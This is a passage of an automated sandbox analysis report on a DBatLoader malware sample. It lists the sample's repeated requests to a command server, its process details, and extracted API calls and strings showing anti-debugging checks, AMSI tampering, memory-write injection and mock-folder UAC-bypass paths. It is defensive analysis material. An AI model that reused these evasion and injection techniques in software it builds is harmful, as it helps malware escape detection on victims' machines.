                    53 | 192.168.2.6 | 50094 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:54 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:55 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:54 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    54 | 192.168.2.6 | 50096 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:56 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:56 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:56 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    55 | 192.168.2.6 | 50098 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:58 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:58 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:58 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    56 | 192.168.2.6 | 50100 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:26:00 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:26:00 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:26:00 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    57 | 192.168.2.6 | 50102 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:26:02 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:26:02 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:26:02 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    58 | 192.168.2.6 | 50104 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:26:04 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:26:04 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:26:04 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    59 | 192.168.2.6 | 50106 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:26:06 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:26:06 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:26:06 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    60 | 192.168.2.6 | 50108 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:26:08 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:26:08 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:26:08 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    61 | 192.168.2.6 | 50110 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:26:09 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:26:10 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:26:10 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8



                    Target ID:0
                    Start time:02:24:06
                    Start date:14/01/2025
                    Path:C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\UAHIzSm2x2.exe"
                    Imagebase:0x400000
                    File size:1'161'216 bytes
                    MD5 hash:483AB6BD562B28782D0999ABEC4F57F5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:Borland Delphi
                    Yara matches:
                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.3461173693.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.3446485255.00000000022F6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false


                      Execution Graph

                      Execution Coverage:6.4%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:14.6%
                      Total number of Nodes:268
                      Total number of Limit Nodes:15

                      Control-flow Graph

call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a7ecc call 28a8798 * 6 CloseHandle call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 3587->4214 4215 28b8726-28b8738 call 28a857c 3587->4215 3850->3851 4487 28b7c8d-28b7ca4 call 28936d0 3851->4487 4674 28b4a21-28b4c7a call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a8704 call 289480c call 289494c call 28946a4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a8704 call 2897e10 3879->4674 4675 28b49c6-28b4a1c call 28ae5cc call 2894d8c call 2894734 call 2894d8c call 28adf00 3879->4675 3880->3879 3882->3360 3883->3882 3952->3953 4214->3125 4215->4214 4956 28b4c7c-28b4cd2 call 28ae5cc call 2894d8c call 2894734 call 2894d8c call 28adf00 4674->4956 4957 28b4cd7-28b50a7 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a8704 call 289494c call 28a8408 Sleep call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894d20 call 28ade78 call 2894d20 call 28ade78 call 289480c call 289494c * 2 MoveFileA call 289480c call 289494c * 2 MoveFileA call 289494c call 2894d20 call 28ade78 call 289494c call 2894d20 call 28ade78 call 289494c call 2894d20 call 28ade78 4674->4957 4675->4674 4956->4957 4957->2014
                      APIs
                      • InetIsOffline.URL(00000000,00000000,028BB3D5,?,?,?,000002F7,00000000,00000000), ref: 028AF0E2
                        • Part of subcall function 028A881C: LoadLibraryA.KERNEL32(00000000,00000000,028A8903), ref: 028A8850
                        • Part of subcall function 028A881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,028A8903), ref: 028A8860
                        • Part of subcall function 028A881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 028A8879
                        • Part of subcall function 028A881C: FreeLibrary.KERNEL32(74F60000,00000000,028F2388,Function_000065D8,00000004,028F2398,028F2388,000186A3,00000040,028F239C,74F60000,00000000,00000000,00000000,00000000,028A8903), ref: 028A88E3
                        • Part of subcall function 028AEFC8: GetModuleHandleW.KERNEL32(KernelBase,?,028AF3CC,UacInitialize,028F237C,028BB40C,UacScan,028F237C,028BB40C,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanString), ref: 028AEFCE
                        • Part of subcall function 028AEFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 028AEFE0
                        • Part of subcall function 028AF024: GetModuleHandleW.KERNEL32(KernelBase), ref: 028AF034
                        • Part of subcall function 028AF024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 028AF046
                        • Part of subcall function 028AF024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 028AF05D
                        • Part of subcall function 02897E10: GetFileAttributesA.KERNEL32(00000000,?,028AFD00,ScanString,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanString,028F237C,028BB40C,UacScan,028F237C,028BB40C,UacInitialize), ref: 02897E1B
                        • Part of subcall function 0289C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029E68C8,?,028B0032,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanBuffer,028F237C,028BB40C,OpenSession), ref: 0289C2FB
                        • Part of subcall function 028ADFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028AE0B4), ref: 028AE01F
                        • Part of subcall function 028ADFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,028AE0B4), ref: 028AE04F
                        • Part of subcall function 028ADFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 028AE064
                        • Part of subcall function 028ADFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 028AE090
                        • Part of subcall function 028ADFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 028AE099
                        • Part of subcall function 02897E34: GetFileAttributesA.KERNEL32(00000000,?,028B2E7D,ScanString,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,Initialize), ref: 02897E3F
                        • Part of subcall function 02897FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,028B301B,OpenSession,028F237C,028BB40C,ScanString,028F237C,028BB40C,Initialize,028F237C,028BB40C,ScanString,028F237C,028BB40C), ref: 02897FD5
                        • Part of subcall function 028ADF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028ADFD2), ref: 028ADF3F
                        • Part of subcall function 028ADF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028ADF79
                        • Part of subcall function 028ADF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028ADFA6
                        • Part of subcall function 028ADF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028ADFAF
                        • Part of subcall function 028A8798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028F23A4,028AA3BF,ScanString,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,Initialize,028F23A4,028AA774,UacScan), ref: 028A87AC
                        • Part of subcall function 028A8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028A87C6
                        • Part of subcall function 028A8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028F23A4,028AA3BF,ScanString,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,Initialize), ref: 028A8802
                        • Part of subcall function 028A8704: LoadLibraryW.KERNEL32(amsi), ref: 028A870D
                        • Part of subcall function 028A8704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 028A876C
                      • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,028BB764), ref: 028B4DEB
                        • Part of subcall function 028ADE78: RtlInitUnicodeString.NTDLL(?,?), ref: 028ADEA0
                        • Part of subcall function 028ADE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028ADEF2), ref: 028ADEB6
                        • Part of subcall function 028ADE78: NtDeleteFile.NTDLL(?), ref: 028ADED5
                      • MoveFileA.KERNEL32(00000000,00000000), ref: 028B4FEB
                      • MoveFileA.KERNEL32(00000000,00000000), ref: 028B5041
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                      • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$
bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                      • API String ID: 2010126900-181751239

                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02890000,028BE790), ref: 02895A94
                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02890000,028BE790), ref: 02895AB2
                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02890000,028BE790), ref: 02895AD0
                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02895AEE
                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02895B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02895B37
                      • RegQueryValueExA.ADVAPI32(?,02895CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02895B7D,?,80000001), ref: 02895B55
                      • RegCloseKey.ADVAPI32(?,02895B84,00000000,?,?,00000000,02895B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02895B77
                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02895B94
                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02895BA1
                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02895BA7
                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02895BD2
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02895C19
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02895C29
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02895C51
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02895C61
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02895C87
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02895C97
                      Similarity
                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                      • API String ID: 1759228003-2375825460

                      APIs
                      • GetModuleHandleW.KERNEL32(KernelBase), ref: 028AF034
                      • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 028AF046
                      • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 028AF05D
                      Similarity
                      • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                      • String ID: CheckRemoteDebuggerPresent$KernelBase
                      • API String ID: 35162468-539270669

                      Control-flow Graph

                      APIs
                        • Part of subcall function 02894ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02894EDA
                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028AE0B4), ref: 028AE01F
                      • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,028AE0B4), ref: 028AE04F
                      • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 028AE064
                      • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 028AE090
                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 028AE099
                        • Part of subcall function 02894C0C: SysFreeString.OLEAUT32(028AED84), ref: 02894C1A
                      Similarity
                      • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                      • String ID:
                      • API String ID: 1897104825-0

                      Control-flow Graph

                      APIs
                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 028AE86A
                      Similarity
                      • API ID: CheckConnectionInternet
                      • String ID: Initialize$OpenSession$ScanBuffer
                      • API String ID: 3847983778-3852638603

                      Control-flow Graph

                      APIs
                        • Part of subcall function 028A8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,028A8088,?,?,00000000,?,028A79FE,ntdll,00000000,00000000,028A7A43,?,?,00000000), ref: 028A8056
                        • Part of subcall function 028A8018: GetModuleHandleA.KERNELBASE(?), ref: 028A806A
                        • Part of subcall function 028A80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028A8148,?,?,00000000,00000000,?,028A8061,00000000,KernelBASE,00000000,00000000,028A8088), ref: 028A810D
                        • Part of subcall function 028A80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028A8113
                        • Part of subcall function 028A80C0: GetProcAddress.KERNEL32(?,?), ref: 028A8125
                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 028A7D6C
                      Similarity
                      • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                      • String ID: Ntdll$yromeMlautriVetirW
                      • API String ID: 2719805696-3542721025

                      Control-flow Graph

                      APIs
                        • Part of subcall function 028A6CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,028A6D39,?,?,?,00000000), ref: 028A6D19
                      • CoCreateInstance.OLE32(?,00000000,00000005,028A6E2C,00000000,00000000,028A6DAB,?,00000000,028A6E1B), ref: 028A6D97
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: CreateFromInstanceProg
                      • String ID:
                      • API String ID: 2151042543-0
                      • Opcode ID: 5dd1d137df8e2e959b2d12338ddd1a410a4d10a8c04af24e6bee2c9dc37fdee3
                      • Instruction ID: d1cde92b92c1b9c993f1588aa862f5a48c6feff3d7ac967804f7b170f47e8e53
                      • Opcode Fuzzy Hash: 5dd1d137df8e2e959b2d12338ddd1a410a4d10a8c04af24e6bee2c9dc37fdee3
                      • Instruction Fuzzy Hash: CD01F77D608704AEFF15DF68DC3286F7BADE749B10BA60835F501D2640FA359910C865

                      Control-flow Graph

                      APIs
                      • Sleep.KERNEL32(00000000,?,02891FC1), ref: 028917D0
                      • Sleep.KERNEL32(0000000A,00000000,?,02891FC1), ref: 028917E6
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 44d1dfb65ba2b6718b34be02021fd638015b251b129e04c03b58feaf56a8d51a
                      • Instruction ID: 41796b5908874d2f7cf0e83bbdda91af4972111e6dadb5bf10be7418b024284d
                      • Opcode Fuzzy Hash: 44d1dfb65ba2b6718b34be02021fd638015b251b129e04c03b58feaf56a8d51a
                      • Instruction Fuzzy Hash: D5B1117EA082928BCF15CF68E888365BBE1EB95314F0C86AAD51DCF3C5C7709551CB90

                      Control-flow Graph

                      APIs
                      • LoadLibraryW.KERNEL32(amsi), ref: 028A870D
                        • Part of subcall function 028A80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028A8148,?,?,00000000,00000000,?,028A8061,00000000,KernelBASE,00000000,00000000,028A8088), ref: 028A810D
                        • Part of subcall function 028A80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028A8113
                        • Part of subcall function 028A80C0: GetProcAddress.KERNEL32(?,?), ref: 028A8125
                        • Part of subcall function 028A7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 028A7D6C
